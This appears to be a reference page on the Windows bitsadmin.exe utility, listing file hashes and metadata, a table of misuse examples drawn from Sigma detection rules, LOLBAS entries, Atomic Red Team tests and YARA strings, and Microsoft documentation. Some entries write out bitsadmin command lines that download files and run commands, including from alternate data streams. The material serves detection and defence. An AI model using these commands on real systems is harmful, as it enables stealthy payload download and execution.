bitsadmin.exe

  • File Path: C:\windows\system32\bitsadmin.exe
  • Description: BITS administration utility

Hashes

Type Hash
MD5 707D3D8A2A2F1B8923C383AEF6370AF7
SHA1 E48D8F65375D067E2903C928C4388DBFCFABBDD3
SHA256 8F3F9E882E4DB13860AE240D6F988D39B641B2AE50F21462BA320993445EEBB8
SHA384 2CDE4F144325C9108299D8403633AEA8D3DFFEF863BE01F3036F1E152F0B5FD449830F8CF4701F21B6082B2A1227A6B1
SHA512 B5EAFEC362576C804D7B194BB85067DAAFD6294A373FBE009A5D49D473A84584E9082FBB44708A8C9530EE4CD6DF6A14D070803BC5401BFC85A8EDBB414889C7
SSDEEP 3072:Z/+YmZndZetIq4QJkSejZ1pMXMCSDw1wpbDORVjW1Xy72WbrODud5q0oSu/2PUG:otQJkSe/kQKobDORVj48g/2

Signature

  • Status: The file C:\windows\system32\bitsadmin.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: bitsadmin.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 7.7.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 7.7.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of bitsadmin.exe being misused. While bitsadmin.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proxy_ua_bitsadmin_susp_tld.yml title: Bitsadmin to Uncommon TLD DRL 1.0
sigma proxy_ua_bitsadmin_susp_tld.yml description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ DRL 1.0
sigma proxy_ua_bitsadmin_susp_tld.yml - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca DRL 1.0
sigma win_apt_greenbug_may20.yml - 'bitsadmin /transfer' DRL 1.0
sigma win_exploit_cve_2020_10189.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_mmc_spawn_shell.yml - '*\BITSADMIN*' DRL 1.0
sigma win_mshta_spawn_shell.yml - '*\BITSADMIN*' DRL 1.0
sigma win_powershell_bitsjob.yml title: Suspicious Bitsadmin Job via PowerShell DRL 1.0
sigma win_process_creation_bitsadmin_download.yml title: Bitsadmin Download DRL 1.0
sigma win_process_creation_bitsadmin_download.yml description: Detects usage of bitsadmin downloading a file DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_process_creation_bitsadmin_download.yml - '*copy bitsadmin.exe*' DRL 1.0
sigma win_shell_spawn_susp_program.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_susp_shell_spawn_from_mssql.yml - '*\bitsadmin.exe' DRL 1.0
sigma win_webshell_spawn.yml - '*\bitsadmin.exe' DRL 1.0
LOLBAS Bitsadmin.yml Name: Bitsadmin.exe  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1  
LOLBAS Bitsadmin.yml Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1  
LOLBAS Bitsadmin.yml Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset  
LOLBAS Bitsadmin.yml - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset  
LOLBAS Bitsadmin.yml Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.  
LOLBAS Bitsadmin.yml - Path: C:\Windows\System32\bitsadmin.exe  
LOLBAS Bitsadmin.yml - Path: C:\Windows\SysWOW64\bitsadmin.exe  
LOLBAS Bitsadmin.yml - IOC: Child process from bitsadmin.exe  
LOLBAS Bitsadmin.yml - IOC: bitsadmin creates new files  
LOLBAS Bitsadmin.yml - IOC: bitsadmin adds data to alternate data stream  
atomic-red-team index.md - Atomic Test #1: Bitsadmin Download (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Bitsadmin Download (cmd) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #9 - Windows - BITSAdmin BITS Download MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #9 - Windows - BITSAdmin BITS Download MIT License. © 2018 Red Canary
atomic-red-team T1105.md This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} MIT License. © 2018 Red Canary
atomic-red-team T1197.md The interface to create and manage BITS jobs is accessible through PowerShell (Citation: Microsoft BITS) and the BITSAdmin tool. (Citation: Microsoft BITSAdmin) MIT License. © 2018 Red Canary
atomic-red-team T1197.md - Atomic Test #1 - Bitsadmin Download (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md - Atomic Test #2 - Bitsadmin Download (PowerShell) MIT License. © 2018 Red Canary
atomic-red-team T1197.md ## Atomic Test #1 - Bitsadmin Download (cmd) MIT License. © 2018 Red Canary
atomic-red-team T1197.md This test simulates an adversary leveraging bitsadmin.exe to download MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} MIT License. © 2018 Red Canary
atomic-red-team T1197.md ## Atomic Test #2 - Bitsadmin Download (PowerShell) MIT License. © 2018 Red Canary
atomic-red-team T1197.md This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /create #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} “” MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /resume #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1197.md bitsadmin.exe /complete #{bits_job_name} MIT License. © 2018 Red Canary
atomic-red-team T1560.001.md bitsadmin /transfer myDownloadJob /download /priority normal “https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe” #{rar_installer} MIT License. © 2018 Red Canary
atomic-red-team T1560.001.md bitsadmin /transfer myDownloadJob /download /priority normal “https://www.7-zip.org/a/7z2002-x64.exe” #{7zip_installer} MIT License. © 2018 Red Canary
signature-base apt_keyboys.yar $x1 = “egsvr32.exe "/u bitsadmin /canceft\windows\currebitsadmin” ascii CC BY-NC 4.0
signature-base gen_github_net_redteam_tools_guids.yara reference = “https://github.com/bitsadmin/nopowershell” CC BY-NC 4.0
signature-base gen_github_net_redteam_tools_guids.yara reference = “https://github.com/bitsadmin/fakelogonscreen” CC BY-NC 4.0
signature-base gen_recon_indicators.yar $s13 = “bitsadmin /rawreturn /transfer getfile” ascii CC BY-NC 4.0
signature-base thor-hacktools.yar reference = “https://github.com/bitsadmin/nopowershell” CC BY-NC 4.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


bitsadmin

Applies to: Windows Server (Semi-Annual Channel), Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows 10

Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform. You can call bitsadmin /? or bitsadmin /help to get a list of switches.

Most switches require a <job> parameter, which you set to the job’s display name, or GUID. A job’s display name doesn’t have to be unique. The /create and /list switches return a job’s GUID.

By default, you can access information about your own jobs. To access information for another user’s jobs, you must have administrator privileges. If the job was created in an elevated state, then you must run bitsadmin from an elevated window; otherwise, you’ll have read-only access to the job.

Many of the switches correspond to methods in the BITS interfaces. For additional details that may be relevant to using a switch, see the corresponding method.

Use the following switches to create a job, set and retrieve the properties of a job, and monitor the status of a job. For examples that show how to use some of these switches to perform tasks, see bitsadmin examples.

Available switches


MIT License. Copyright (c) 2020-2021 Strontic.